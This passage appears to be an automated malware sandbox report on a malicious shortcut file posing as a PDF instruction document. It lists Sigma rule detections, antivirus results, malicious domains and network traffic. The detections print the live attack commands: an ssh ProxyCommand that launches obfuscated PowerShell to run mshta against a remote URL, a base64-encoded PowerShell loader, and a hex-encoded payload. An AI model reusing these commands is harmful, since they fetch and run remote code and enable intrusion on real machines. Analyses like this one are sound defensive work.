ADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68A
        Sigma detected: Lolbin Ssh.exe Use As Proxy
        Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., CommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., CommandLine|base64offset|contains: , Image: C:\Windows\System32\OpenSSH\ssh.exe, NewProcessName: C:\Windows\System32\OpenSSH\ssh.exe, OriginalFileName: C:\Windows\System32\OpenSSH\ssh.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., ProcessId: 6480, ProcessName: ssh.exe
        Sigma detected: Suspicious Execution of Powershell with Base64
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc IAAgACAAWwBOAEUAVAAuAHMAZQByAFYASQBDAGUAcABvAGkAbgB0AE0AYQBOAGEAZwBFAHIAXQA6ADoAUwBlAEMAdQByAEkAVAB5AFAAUgBPAFQATwBDAG8ATAAgAAkACQA9ACAACQBbAE4AZQB0AC4AcwBFAGMAdQBSAGkAdABZAHAAUgBPAFQATwBjAG8ATABUAFkAcABFAF0AOgA6AFQAbABzACwAIAAgAFsAbgBlAFQALgBzAEUAQwBVAHIASQBUAHkAUABSAE8AVABPAEMATwBMAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAxACwAIAAJAFsAbgBlAFQALgBzAGUAQwBVAFIAaQB0AHkAUABSAE8AVABPAEMATwBsAFQAWQBwAGUAXQA6ADoAVABsAHMAMQAyACwAIAAJAFsAbgBlAHQALgBzAEUAQwB1AHIAaQB0AHkAcABSAG8AVABvAGMAbwBsAHQAeQBwAEUAXQA6ADoAUwBzAGwAMwAgACAAOwAgAAkAIABbAG4ARQBUAC4AUwBFAHIAVgBpAEMARQBQAG8AaQBuAFQATQBBAE4AYQBnAGUAUgBdADoAOgBTAGUAQwBVAFIAaQB0AHkAUAByAE8AdABPAGMAbwBsACAACQA9ACAACQAJACcAVABsAHMALAAgAAkAVABsAHMAMQAxACwAIAAgAAkAVABsAHMAMQAyACwAIAAJAFMAcwBsADMAJwAgACAACQA7ACAAIAAJAGkAZQB4ACgAIAAgACAASQB3AHIAIAAJAAkAKABbAGMAaABhAFIAXQAgACAACQAwAFgANgA4ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAYQBSAF0AIAAgAAkAMABYADcANAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAcgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAFIAXQAgACAACQAwAHgANwAwACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAYwBIAGEAcgBdACAAIAAJADAAWAAzAEEAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQBSAF0AIAAgAAkAMABYADIARgAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAcgBdACAAIAAJADAAWAA3ADAAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMASABBAHIAXQAgACAACQAwAHgANgAxACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAYQByAF0AIAAgAAkAMAB4ADcAMwAgACAACQAgACAACQArACAAIAAJAFsAQwBIAEEAUgBdACAAIAAJADAAWAA3ADQAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABBAHIAXQAgACAACQAwAHgANgA1ACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMABYADYAMgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAWAA2ADkAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAHgANgBFACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAEgAQQByAF0AIAAgAAkAMABYADIARQAgACAACQAgACAACQArACAAIAAJAFsAYwBoAEEAUgBdACAAIAAJADAAeAA2ADMAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMASABhAHIAXQAgACAACQAwAHgANgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBjAGgAQQByAF0AIAAgAAkAMAB4ADYARAAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAAyAEYAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABhAFIAXQAgACAACQAwAFgANwAyACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAQQByAF0AIAAgAAkAMAB4ADYAMQAgACAACQAgACAACQArACAAIAAJAFsAQwBoAEEAUgBdACAAIAAJADAAeAA3ADcAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABhAFIAXQAgACAACQAwAHgAMgBGACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAYQByAF0AIAAgAAkAMAB4ADMAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBIAEEAcgBdACAAIAAJADAAWAA3ADYAIAAgAAkAIAAgAAkAKwAgACAACQBbAGMAaABBAFIAXQAgACAACQAwAFgAMwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAEgAQQBSAF0AIAAgAAkAMABYADUANgAgACAACQAgACAACQArACAAIAAJAFsAQwBoAGEAcgBdACAAIAAJADAAeAA2ADgAIAAgAAkAIAAgAAkAKwAgACAACQBbAEMAaABBAFIAXQAgACAACQAwAFgANwA2ACAAIAAJACAAIAAJACsAIAAgAAkAWwBDAGgAYQBSAF0AIAAgAAkAMABYADcAMAAgACAACQAgACAACQArACAAIAAJAFsAYwBoAGEAcgBdACAAIAAJADAAeAA2ADIAIAAgAAkAKQApAA== , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), CommandLine: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']')" ., ParentImage: C:\Windows\System32\OpenSSH\ssh.exe, ParentProcessId: 6480, ParentProcessName: ssh.exe, ProcessCommandLine: powershell powershell -Command ('m]]]]]]]sh]]]]]]]ta]]]]]].]]]]]e]]]]]]x]]]]]e]]]]] h]]]]]tt]]]]]]ps:]]]]]]/]]]]]/c]]]]]n]]]]]]d]]]]]]]e]]]]]]f]]]]]]]1]]]]].]]]]]]g]]]]]r]]]]]]]e]]]]]en-pa]]]]]]]th]]]]]]]w]]]]]a]]]]]ys.s]]]]]ho]]]]]p/]]]]]]api]]]]]]]/re]]]]]]]g/]]]]]]]z]]]]].]]]]]mp]]]]]4]]]]]]' -replace ']'), ProcessId: 6568, ProcessName: powershell.exe
        Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591E8E2D5F71F36954FA29E50B541460253DDD47F8D68A
        Sigma detected: Windows Processes Suspicious Parent Directory
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7056, ProcessName: svchost.exe

        Suricata Signatures

        No Suricata rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: https://berb.fitnessclub-filmfanatics.comAvira URL Cloud: Label: malware
        Source: https://berb.fitnessclub-filmfanatics.com/naailq0.cplAvira URL Cloud: Label: malware
        Source: http://berb.fitnessclub-filmfanatics.comAvira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkVirustotal: Detection: 34%Perma Link
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkReversingLabs: Detection: 26%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.9% probability
        Machine Learning detection for sample
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 104.21.83.229:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 180.163.242.102:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 103.235.47.188:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.66.20:443 -> 192.168.2.5:49739 version: TLS 1.2
        Source: Binary string: blib.pdb source: powershell.exe, 00000009.00000002.2436299417.0000029524A40000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

        Networking

        barindex
        Connects to a pastebin service (likely for C&C)
        Source: unknownDNS query: name: pastebin.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /naailq0.cpl HTTP/1.1Host: berb.fitnessclub-filmfanatics.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
        Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
        Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
        Source: Joe Sandbox ViewIP Address: 103.235.47.188 103.235.47.188
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /api/reg/z.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cndef1.green-pathways.shopConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /raw/0v6Vhvpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /api/reg/z.mp4 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cndef1.green-pathways.shopConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /raw/0v6Vhvpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.360.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.baidu.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /naailq0.cpl HTTP/1.1Host: berb.fitnessclub-filmfanatics.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: cndef1.green-pathways.shop
        Source: global trafficDNS traffic detected: DNS query: pastebin.com
        Source: global trafficDNS traffic detected: DNS query: www.360.net
        Source: global trafficDNS traffic detected: DNS query: 360.net
        Source: global trafficDNS traffic detected: DNS query: www.baidu.com
        Source: global trafficDNS traffic detected: DNS query: berb.fitnessclub-filmfanatics.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 17 Dec 2024 07:48:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oll0ScsLPkgKbJza0MKzrcTGwOEAEuKqAPlZpOwSd96YFxxyp0q0fOWAV4Ty6gLU1hn8PwekCV0TJDkM2MYp%2Fn8lOaSGFHwFt9QKHSeAlDTegho8YD0nYmujAgB%2FfyG6OMNW%2FvptkRH7FfjZXXkEcPMneAU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f354faebfd84391-EWR
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://berb.fitnessclub-filmfanatics.com
        Source: svchost.exe, 00000006.00000002.3313420291.000001FDFF284000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
        Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
        Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000007.00000002.2172223348.0000022C901B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2172223348.0000022C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C805C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CB76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2428867624.000002951CA34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E696000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD7A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E8F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.360.net
        Source: powershell.exe, 00000007.00000002.2131766032.0000022C8023A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CBE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com
        Source: powershell.exe, 00000007.00000002.2183387067.0000022CF4021000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: powershell.exe, 00000004.00000002.2077643742.0000024FAD3EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.wshifen.com
        Source: powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.net
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E03F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E01C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950CD67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.net/
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://360.net9
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E64C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
        Source: powershell.exe, 00000002.00000002.2085750541.0000018A0E669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD73B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2078120843.0000024FAD77E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2131766032.0000022C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950C9C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000009.00000002.2356233458.000002950CF37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2356233458.000002950E954000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://berb.fitnessclub-filmfanatics.com
